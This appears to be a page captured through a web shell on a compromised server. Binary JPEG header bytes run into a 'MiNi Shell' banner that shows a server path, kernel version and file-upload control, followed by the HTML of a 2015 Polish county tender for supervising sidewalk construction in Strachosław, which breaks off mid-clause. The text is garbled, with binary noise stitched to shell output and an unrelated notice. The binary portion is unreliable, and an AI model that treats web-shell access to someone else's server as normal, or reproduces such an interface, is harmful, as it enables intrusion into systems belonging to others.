JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150714/175696-N-2015.html

<p class="kh_header"><b>Chełm: Pełnienie nadzoru inwestorskiego nad realizacją zadania pn. Budowa chodnika 
w miejscowości Strachosław w ciągu drogi  powiatowej Nr 1840L, gm. Kamień</b><br>
<b>Numer ogłoszenia: 175696 - 2015; data zamieszczenia: 14.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chełmski , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 82 5627501, faks 82 5627510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.powiat.chelm.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad realizacją zadania pn. Budowa chodnika 
w miejscowości Strachosław w ciągu drogi  powiatowej Nr 1840L, gm. Kamień.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie pełnego nadzoru inwestorskiego nad robotami branży drogowej dotyczącymi zadania pn. Budowa chodnika w miejscowości Strachosław w ciągu drogi powiatowej Nr 1840L, gm. Kamień. W trakcie realizacji zadania inwestycyjnego Wykonawca będzie sprawował funkcję nadzoru inwestorskiego w pełnym zakresie, wynikającym z art. 25 i 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane /Dz. U. z 2013 r. poz. 1409/ oraz będzie odpowiedzialny za realizację zadania i jego rozliczenie. Inspektor nadzoru ma nadzorować budowę codzienne od dnia przekazania placu budowy do dnia ostatecznego odbioru robót w czasie trwania prac budowlanych związanych z realizacją zadania. Na żądanie Zamawiającego Wykonawca ma obowiązek stawienia się na placu budowy w ciągu 1 godziny od telefonicznego wezwania Wykonawcy przez Zamawiającego. Do zadań Wykonawcy w trakcie realizacji zadania należy w szczególności:1. Prowadzenie nadzoru nad prawidłowym przebiegiem robót zgodnie z umową. 2.Kontrola i dopilnowanie, aby wszystkie używane urządzenia i materiały posiadały stosowne świadectwa i certyfikaty wymagane przepisami i dokumentacją projektową.3. Sprawdzenie ważności ubezpieczeń osób zatrudnionych oraz używanego sprzętu. 4. Kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego.5. Rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót, a w razie potrzeby zasięganie opinii autora projektu.6. Uczestniczenie przy prowadzeniu przez Wykonawcę robót koniecznych prób, pomiarów i sprawdzeń.7. Egzekwowanie od Wykonawcy dodatkowych badań i pomiarów względnie przeprowadzenia badań niezależnych w przypadku wątpliwości, co do wiarygodności badań Wykonawcy.8. Wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: wykonywania prób, wymagających odkrycia robót lub elementów zakrytych. 9. Kontrola i odbiór robót budowlanych ulegających zakryciu lub zanikających. 10. Zawieszenie robót budowlanych w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi bądź spowodować znaczne straty materialne.11. Kontrola i weryfikacja wszelkich przedkładanych przez Wykonawcę dokumentów.12. Kontrola postępu wykonywanych robót.13. Potwierdzenie faktycznie wykonanego zakresu robót jako podstawy do wystawienia faktury zgodnie z postanowieniami umowy zawartej między Zamawiającym i Wykonawcą robót budowlanych.14. Weryfikacja, analizowanie i zatwierdzanie do zapłaty faktur wystawionych przez Wykonawcę robót budowlanych w związku z realizacją umowy na roboty budowlane.15. Uzgadnianie z Wykonawcą robót budowlanych rodzaju dokumentacji powykonawczej, sprawdzanie jej i zatwierdzanie w porozumieniu z Zamawiającym.16. Uczestnictwo w komisji odbioru końcowego inwestycji oraz komisjach odbiorów gwarancyjnych, w tym prowadzenie wraz z Zamawiającym przeglądów gwarancyjnych. Zamawiający zakłada, że w okresie gwarancyjnym przynajmniej raz na rok dokonywane będą przeglądy stanu technicznego wybudowanych i przebudowanych obiektów. 17. Zarządzanie całym procesem przekazania obiektu do użytkowania.18. Wykonanie badań :- dla podbudowy z betonu cementowego:Tablica 1. Częstotliwość oraz zakres badań i pomiarów1.Lp. 2.Wyszczególnienie badań i pomiarów, 3.Częstotliwość badań, 4.Wartości dopuszczalne, 1.Badanie kwalifikacyjne: sprawdzenie materiałów, ustalenie składu mieszanki, raz na etapie projektowania składu mieszanki i przy każdej zmianie materiału, wg punktu 2 i 5.  2.Badanie w czasie robót- rzędne podłoża gruntowego, na 0,1 długości odbieranego odcinka, wg 5.3.2. - zagęszczenie podłoża gruntowego, w 3 przekrojach na każdej działce roboczej, wg 5.3.2. - konsystencja mieszanki betonowej,  2 razy w czasie zmiany roboczej, wg 2.2.9. - wytrzymałość betonu na ściskanie, raz dziennie, wg 2.2.9. 3.Badania odbiorcze po wykonaniu podbudowy- grubość podbudowy raz na każde 2000 m długości odbieranego odcinka, odchyłka grubości ? 1 cm, nasiąkliwość wg PN-S- 96014:1997 [10] i pktu 2.2.9.- nasiąkliwość betonu w podbudowie, raz na każde 2000 m długości odbieranego odcinka, odchyłka grubości ? 1 cm, nasiąkliwość wg PN-S- 96014:1997 [10]  i pktu 2.2.9,-mrozoodporność betonu w podbudowie, na próbkach badanej nasiąkliwości, wg PN-S-96014:1997 [10]. - szerokość podbudowy, 2 razy, odchyłka szerokości ? 5 cm. - równość w przekroju poprzecznym, 2 razy, prześwity między łatą a powierzchnią (<=) 12 mm. - spadki poprzeczne, jw., odchylenia ? 0,5 % spadków zaprojektowanych. - równość podbudowy w profilu podłużnym (badania łatą 4-metrową), w 2 miejscach, nierówności (<=)12 mm.- wytrzymałość betonu w podbudowie (metodą nieniszczącą lub na próbkach wyciętych), w 2 losowo wybranych miejscach, wg PN-S-96014:1997 [10] .- rozmieszczenie i wypełnienie szczelin, w 2 miejscach losowo wybranych, oględziny zgodności z dokumentacją projektową. - dla podbudowy z kruszywa łamanego, stabilizowanego mechanicznie:Tablica 2. Częstotliwość oraz zakres pomiarów wykonanej podbudowy z tłucznia Kamiennego Lp. Wyszczególnienie badań i pomiarów, Minimalna częstotliwość pomiarów 1. Szerokość podbudowy, 10 razy na 1 km. 2.Równość podłużna, w sposób ciągły planografem albo co 20 m łata na każdym pasie ruchu.3. Równość poprzeczna, 10 razy na 1 km.4. Spadki poprzeczne *), 10 razy na 1 km. 5. Rzędne wysokościowe, co 100 m w osi jezdni i na jej krawędziach. 6. Ukształtowanie osi w planie *), co 100 m.7. Grubość podbudowy, Podczas budowy:w 3 punktach na każdej działce roboczej, lecz nie rzadziej niż raz na 400 m2, Przed odbiorem:w 3 punktach, lecz nie rzadziej niż raz na 2000 m2.8. Nośność podbudowy, nie rzadziej niż raz na 3000 m2, *) Dodatkowe pomiary spadków poprzecznych i ukształtowanie osi w planie należy wykonać w punktach głównych łuków poziomych. Zakres robót objętych nadzorem inwestorskim obejmuje: Roboty Przygotowawcze: 1. Roboty pomiarowe przy liniowych robotach ziemnych (drogi). Trasa dróg w terenie równinnym krotność = 1,00 - 0,81 km; Roboty rozbiórkowe 2. Rozebranie chodników z płyt betonowych o wymiarach 35x35x5 cm, na podsypce piaskowej krotność= 1,00 - 325,00 m2; 3. Rozebranie krawężników betonowych na podsypce cementowo-piaskowej krotność= 1,00 - 790,00 m; 4. Rozebranie obrzeży trawnikowych o wymiarach 6x20 cm, na podsypce piaskowej krotność= 1,00 - 186,00 m; 5. Mechaniczne rozebranie podbudowy z betonu o grubości 12 cm krotność= 1,00 - 20,00 m2; 6. Roboty remontowe - cięcie piłą nawierzchni bitumicznych na gł. Do 5 cm (łuk przy świetlicy) - 20,00m, 7. Mechaniczna rozbiórka nawierzchni bitumicznej o gr. 4 cm z wywozem materiału z rozbiórki na odl. do 1 km - 20,00 m2, 8. Ręczne rozebranie nawierzchni z kostki brukowej o wysokości 6 cm na podsypce cementowo -piaskowej - 21,475 m2, 9. Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym na odległość 1 km - 54,371 m3, 10. Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym - dodatek za każdy następny rozpoczęty 1 km krotność = 12 - 54,371 m3, 11. Rozebranie barierek przy szkole i świetlicy (długość ok 5,0 m każda) obmiar = 2 szt.Chodnik 12. Mechaniczne wykonanie koryta na całej szerokości chodników w gruncie kat.V-VI głębok. 20 cm - 1118,16 m2, 13. Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat.V-VI - za każde dalsze 5 cm głębok. krotność = 2 - 1118,16 m2, 14. Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gr.kat.V-VI - 1118,16 m2, 15 Obrzeża betonowe o wymiarach 20x6 cm na podsypce cementowo - piaskowej, spoiny wypełnione piaskiem - 1110,40 m, 16. Opór za obrzeżami z gruntocementu Rm=5,0MPa - 16,656 m3, 17. Krawężniki betonowe 15x30x100 na ławie betonowej z oporem (obniżone + wystające +ułożone na płask) - na odcinkach prostych i łuku przy świetlicy - 549,40 m, 18. Krawężniki betonowe 15x30x100 na ławie betonowej na łukach zjazdów (krawężniki łukowe R5, R3, R2) - 48,70 m, 19. Podbudowa z gruntu stabilizowanego cementem o Rm=2,5MPa gr 10 cm (mieszanka wykonana w wytwórni betonów) - 1118,16 m2, 20. Warstwa górna podbudowy z kruszyw łamanych o grubości po zagęszczeniu 10 cm - 1118,16 m2, 21. Chodnik z kostki gr 6 cm na podsypce cementowo-piaskowej kolor szary (w tym 5% kolor czerwony), Zjazdy publiczne 22. Roboty ziemne wykon.koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat.III z transp.urobku samochod.samowyładowczymi na odległość do 5 km - 24,40 m3, 23. Profilowanie i zagęszczanie podłoża wykonywane ręcznie w gruncie kat. II-IV pod warstwy konstrukcyjne nawierzchni - 48,80 m2, 24. W-wa odsączająca z piasku średnioziarnistego gr po zagęszczeniu 10 cm - 48,8 m2, 25. Podbudowa z grunto - cementu o Rm=5 MPa gr 15 cm (wykonana w wytwórni betonów) - 48,8 m3, 26. Podbudowa z kruszywa łamanego 0/31,5 gr 15 cm - 48,8 m2, 27. Nawierzchnia zjazdów z betonowej kostki brukowej gr. 8 cm czerwonej na podsypce cem-piask gr 4 cm - 48,8 m2,Zjazdy indywidualne 28. Roboty ziemne wykonane mechanicznie Roboty ziemne wykon.koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat.III z transp.urobku samochod.samowyładowczymi na odległość do 5 km - 137,385 m3, 29. Profilowanie i zagęszczanie podłoża wykonywane mechanicznie w gruncie kat. II-IV pod warstwy konstrukcyjne nawierzchni - 305,30 m2, 30. Obrzeża betonowe o wymiarach 30x8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin zaprawą cementową - 112,80 m, 31. Opór za obrzezami z gruntocementu Rm=5,0MPa - 0,936 m3,  32. Podbudowy z gruntocementu Rm=2,5 MPA gr.15 cm (wykonana w wytwórni betonów)  - 305,30 m2  33. Podbudowa z kruszywa łamanego 0/31,5 gr 20 cm - 303,30 m2, 34. Nawierzchnia zjazdów z betonowej kostki brukowej gr. 8cm czerwonej na podsypce cem-piask gr 4 cm z wypełnieniem spoin piaskiem - 305,30 m2,Zatoka autobusowa
35. Roboty ziemne wykon.koparkami podsiębiernymi o poj.łyżki 0.40 m3 w gr.kat.III z transp.urobku samochod.samowyładowczymi na odległość do 5 km - 57,684 m3, 36. Profilowanie i zagęszczanie podłoża wykonywane ręcznie w gruncie kat. II-IV pod warstwy konstrukcyjne nawierzchni - 96,14 m2, 37. Podbudowy z gruntocementu Rm=1,5 MPa gr.10 cm (wykonana w wytwórni betonów) - 96,14 m3, 38. Podbudowa z grunto - cementu o Rm=5,0 MPa gr 20 cm (wykonana w wytwórni betonów) - 96,14 m2, 39. Podbudowa z kruszywa łamanego 0/31,5 gr 20 cm - 96,14 m2, 40. Nawierzchnia zatoki z betonowej kostki brukowej gr. 8 cm czerwonej na podsypce cem-piask gr 4 cm, Odbudowa nawierzchni przy krawężniku 41. Warstwa dolna podbudowy z kruszywa łamanego 0/31,5 gr 25 cm - 65,291 m2, 42. Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych AC 11S o grubości 6 cm (warstwa ścieralna) - 65,291 m2, Odwodnienie 43. Cieki podchodnikowe wg rys 5.1 (projet wykonawczy) obmiar = 4 szt., 
Urządzenia BRD 44. Barierki ochronne typ olsztyński obmiar = 9 m Oznakowanie
45. Mechaniczne usuwanie linii P-17 przy zatoce autobusowej - 1,8 m2, 46. Zdejmowanie tablic znaków drogowych zakazu, nakazu, ostrzegawczych, informacyjnych obmiar = 2 szt.
47. Montaż słupków do znaków drogowych z rur stalowych o śr. 60 mm (słupek z rozbiórki) obmiar = 1 szt. 48. Przymocowanie drogowskazów jednoramiennych o powierzchni do 0.3 m2 (znaki z rozbiórki D-15) obmiar = 2 szt.Roboty dodatkowe 49.Przestawienie wiaty autobusowej obmiar = 1 szt. Szczegółowy zakres robót i warunki realizacji określa dokumentacja techniczna, tj. w szczególności:1. Przedmiar robót.2. Szczegółowa specyfikacja techniczna wykonania i odbioru robót..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie osobami: 1 osobą do pełnienia funkcji inspektora nadzoru branży drogowej posiadającą ważne uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej oraz min.24 miesięczny staż pracy na stanowisku inspektora nadzoru lub kierownika budowy nad robotami branży drogowej. Uprawnienia budowlane powinny być wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane. W przypadku nabycia uprawnień w innym kraju niż Polska będą także uznawane kwalifikacje zawodowe nabyte w państwach członkowskich Unii Europejskiej oraz państwach Europejskiego Obszaru Gospodarczego (European Economic Area -EEA) i Konfederacji Szwajcarskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się z udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1 oraz brak podstaw do wykluczenia wskazanych w art. 24 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego. Pełnomocnictwo powinno być przestawione w formie oryginału, bądź kserokopii poświadczonej przez notariusza.
 Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność  z oryginałem przez Wykonawcę bądź upoważnionego przedstawiciela Wykonawcy, zgodnie z treścią dokumentu określającego status Wykonawcy bądź treścią załączonego do oferty pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty w zakresie:
1)	terminu realizacji umowy gdy jest ona spowodowana:
a)	warunkami atmosferycznymi uniemożliwiającymi wykonywanie robót w stosunku do których prowadzony jest nadzór (przez warunki atmosferyczne uniemożliwiające wykonywanie robót należy rozumieć warunki atmosferyczne w znaczny sposób odbiegające od warunków zwykle panujących o tej samej porze roku na terenie realizowania robót),
b)	epidemią stwierdzoną przez uprawnione do tego organy,
c)	siłą wyższą, 
